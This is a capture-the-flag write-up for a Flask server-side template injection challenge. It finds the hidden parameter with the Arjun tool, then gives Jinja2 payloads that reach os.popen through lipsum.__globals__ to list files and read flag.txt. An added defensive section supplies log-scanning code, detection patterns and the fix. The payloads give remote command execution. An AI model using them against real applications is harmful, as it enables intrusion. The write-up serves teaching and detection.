[RootersCTF2019]I_<3_Flask
2022-07-26 22:39:00 【茶经新读.】
A fairly simple SSTI challenge; the difficulty lies in finding the parameter to inject into.

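The site uses the Flask framework, so the next step is to look for Flask routes. F12 (the browser developer tools) reveals nothing useful. This calls for a tool, Arjun, which can brute-force the parameter we need:
Download: GitHub - s0md3v/Arjun: HTTP parameter discovery suite.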
pip3 install arjun
python3 setup.py install
Run arjun -h to check the version; if the following page appears, the installation succeeded:

arjun -u http://xxxxxxx.node4.buuoj.cn:81/ -c 100 -d 5

Next, directly use a Flask method: lipsum
It can be used to obtain __builtins__, and lipsum.__globals__ contains the os module: {{lipsum.__globals__['os'].popen('ls').read()}}
Then build the payload: /?name={{lipsum.__globals__['os'].popen('ls').read()}}

This reveals flag.txt, so simply use the cat command:
payload: /?name={{lipsum.__globals__['os'].popen('cat flag.txt').read()}}
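
From the defender's side, both stages of this write-up leave traces in the web access log: the parameter brute-force sends many query parameters in one request (the -c 100 chunk size above), and the injection puts a Jinja2 expression in the name parameter. The following Python code is an added example, not part of the original write-up; the log lines are constructed samples, and the threshold and finding labels are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not taken from the original page).
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Jul/2022:22:30:01 +0000] "GET /?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [26/Jul/2022:22:31:10 +0000] "GET /?'
    + "&".join(f"p{i}=1" for i in range(100)) + ' HTTP/1.1" 200 498',
    '10.0.0.9 - - [26/Jul/2022:22:35:42 +0000] "GET /?name=%7B%7Blipsum.__globals__'
    '%5B%27os%27%5D.popen(%27ls%27).read()%7D%7D HTTP/1.1" 200 640',
    '10.0.0.9 - - [26/Jul/2022:22:34:02 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 502',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Jinja2 expression or statement delimiters inside a decoded parameter value.
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Dunder attribute access and the names used in this write-up's payloads.
OBJECT_WALK = re.compile(r"__\w+__|\b(?:lipsum|popen|os)\b")
MAX_PARAMS = 30  # assumed threshold; tune to what the application really accepts


def classify(line):
    """Return a list of findings for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    # parse_qsl percent-decodes keys and values, so encoded braces are caught.
    params = parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True)
    findings = []
    if len(params) >= MAX_PARAMS:
        findings.append("param-bruteforce")
    for key, value in params:
        if TEMPLATE_EXPR.search(value):
            findings.append(f"template-expr:{key}")
            if OBJECT_WALK.search(value):
                findings.append(f"ssti-object-walk:{key}")
    return findings


def scan(lines):
    """Map line index -> findings, for lines that triggered at least one rule."""
    return {i: f for i, line in enumerate(lines) if (f := classify(line))}


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG).items():
        print(index, findings)
```

The underlying fix is on the server: user input must be passed to the template as a context variable, never concatenated into the template source that gets rendered.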